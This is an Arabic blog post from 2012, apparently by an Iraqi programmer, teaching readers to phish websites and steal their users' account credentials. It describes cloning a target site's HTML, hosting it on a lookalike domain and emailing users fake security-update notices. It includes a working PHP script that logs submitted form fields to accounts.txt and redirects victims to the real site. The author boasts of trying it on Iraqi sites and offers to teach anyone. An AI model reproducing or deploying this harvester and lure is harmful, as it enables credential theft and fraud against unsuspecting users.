كيفية صيد المواقع العالمية ..وتحويل حسابات المسجلين إليك ..!!!!

تحية طيبة الى زوار المدونــــــة

من اهم طرق قرصنة المواقع العالمية حاليا هي طريقة صيد المواقع والتي تسمى فشنك …

Hacking web sites by Phishing method …..?

ماهي الفشنك …..؟؟؟

نتبع الاجراءات التالية …

لنفرض نحن نريد صيد حسابات المشتركين في الموقع التالي  

http://www.any-web-site-to-phishing.com

 

نتبع الخطوات التالية :-

  1.  نذهب الى شريط الادوات للمستعرض الفايرفوكس موزيلا …

  2.  نضغط على view    ثم  page source   لمعاينة المصدر البرمجي المكتوب بلغة  HTML الترابطية التشعبية . وهو لغة ساكنة .

  3.  ثم نقوم بنسخة : edit   —- select all —- copy

  4.  ثم فتح أي ملف في النوت باد  النصي البسيط ..ولصق الملف فيه وخزنه باسم index.html

  5.  ثم البحث  في الملف اعلاه عن التحرير عن كود برمجي وهو  “

  6.  

    <form method=”get”  action=”http://www.any-web-site-to-phishing.com/phishing.php”&gt;

  7.  وربطه بالبرنامج ادناه … بالصيغة

  8.  اسم البرنامج PHISHING.PHP

  9.  وملف لخزن الحسابات المستخدمين بصيغة ملف نصي

  10. اذا الان لدينا ثلاثة ملفات وهما : index.html

  11. وملف phishing.php

  12. وملف نصي :accounts.txt


لكن يجب ان نجد موقع لكي تستضيف تلك الملفات اعلاه … لكن كن حذر والانتباه هناك كثير من مواقع الاستضافة المجانية …..لاتتقبل ملفات الصيد لكي لاتعاقب ضمن قائمة المواقع السوداء التي تم الحضر عليها من حيث الاستضافة ومراقبتها …

ان كنت تريد ان تنجخ ويتقبل موقع لاستضافتك عليك البحث والبحث والبحث عن مواقع تستضيف ملفاتك لصيد المواقع عن طريقهم …!!!. بعد ان يتم رفع الملفات ..الى المستضيف … ولتكن بصيغة اسم الموقع تقريبا أي مشابها لاسم الموقع المراد صيده ..!!!!

أي :

www.any-web-site-to-phishing.org

 

ثم بعد ذلك نقوم بارسال رسائل اخطار الى جميع المشتركين في هذا الموقع اعلاه

بالقيام بالتحديث لاغراض الامني لحسابهم …وارفاق رابط موقعك المزيف ..!!! اليهم ..!!!

فسوف يدخل المستخدم لتحديث حسابه بعد قراءة الرسالة القادمة من فريق الدعم الفني …!! فسوف يتم ارسال حسابه الى ملف :

Accounts.txt …..!!!

 

وبعد عدة مستخدمين لتفعيل رابط الموقع المزيف يتم تسجيل عدد  معين من حسابات المستخدمين …!!

 

واليكم كود phishing.php

 

<?php

header(“Location: http://www.any-web-site-to-phishing.com&#8221;);

$handle = fopen(“accounts.txt”, “a”);

foreach($_GET as $variable => $value)

 {

fwrite($handle, $variable);

fwrite($handle, “=”);

fwrite($handle, $value);

fwrite($handle, “\r\n”);

}

fwrite($handle, “\r\n”);

fclose($handle);

exit;

?>

ملاحظة :-

تم تجريبها على بعض المواقع العراقية …!!! لان صيدها جدا سهلا وبسيطا هههههههههههه

واني على استعداد لكل مبرمج عراقي او عربي في تعلمه كيفية صيد أي موقع …!!!

يرجى الاتصال على البريد الالكتروني :

 

Iraq2009@fastmail.fm


تحياتي للجميع

وصيدا وفيرا …!! وبالتوفيق

 

 

 

 

 

 

About فلاح كاطع صالح

مبرمج ومدرس مادة الفيزياء والرياضيات وباحث في المجال العلمي والفني العراق بغداد

Posted on فبراير 23, 2012, in مقالات حاسوب and tagged , , , . Bookmark the permalink. أضف تعليقاً .

أضف تعليقاً

إملأ الحقول أدناه بالمعلومات المناسبة أو إضغط على إحدى الأيقونات لتسجيل الدخول:

WordPress.com Logo

أنت تعلق بإستخدام حساب WordPress.com. تسجيل خروج   / تغيير )

صورة تويتر

أنت تعلق بإستخدام حساب Twitter. تسجيل خروج   / تغيير )

Facebook photo

أنت تعلق بإستخدام حساب Facebook. تسجيل خروج   / تغيير )

Google+ photo

أنت تعلق بإستخدام حساب Google+. تسجيل خروج   / تغيير )

Connecting to %s

%d مدونون معجبون بهذه: